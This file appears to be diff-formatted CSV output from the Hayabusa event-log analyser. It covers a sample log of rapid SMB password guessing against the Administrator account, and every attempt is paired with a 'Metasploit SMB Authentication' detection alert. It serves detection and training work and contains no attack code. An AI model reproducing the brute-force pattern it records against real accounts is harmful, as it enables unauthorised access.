+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2SmitfyjO4mxqw5E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nrq1g8ktTQbPTXqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 943GV3t1muba5IQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPVd28zf85AxdGqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D6evoSSxcKkHspuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C4fznmrnIdUH7DzG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwrrYjUV41P0K5Jh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4RBZrALEnH5BKP9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LU6uWH4gs4iHP7rV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCfhZDAH8ufk77zN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TE9pw4UeRldGeKVc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8PKE05MqxE5TwXT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GIE5fmddOPBbCM3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pveyo4Czx6KWKCGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPyyHaRnBec7Qg2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3b8mudJp5mdkiEW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Y6mjLaCzR28Q2qK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dMsNKWEjeCYYQVqw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7c5fENhkwO6QfEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cr1wAeMhPgVpwV82  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErpp9Ww6LO37C9k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYsNpBsGT5zOKe3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgzUk1Dmttm4AQ3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hp0c3YYyOSJuBHCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gkis4H1MIQPHUwqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lb6mH03qKLb8O7Dz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J10xEmhRNWfJ5FCI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Dujj8A7wwzAwzCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVDE3fIoUQfLn3cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UlD48O0XpFUnuSmo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KyTPKuspADmLpv0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BdIAPiH32ZbmCgTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dEiN2xOA4E9Wl5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBeAez2fLjXB0dk3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gQ45aeMDc3Snabvv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWSYdr4lJlhCLMMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgxHY7072aUCdfa0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9yKhEodJDTVCGdIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z0odyPQmvkGRNWZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b5uRpG0fxCK75DPV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d9dcEzpJRW5YA8Bj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv3B9bwB1YIaBa6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJf9Obml4aVxE5zp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mvnSOaRSkGU6Uf5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JSAkZsZsv0SaLKaO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6rnM6QbwfbbrcGy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
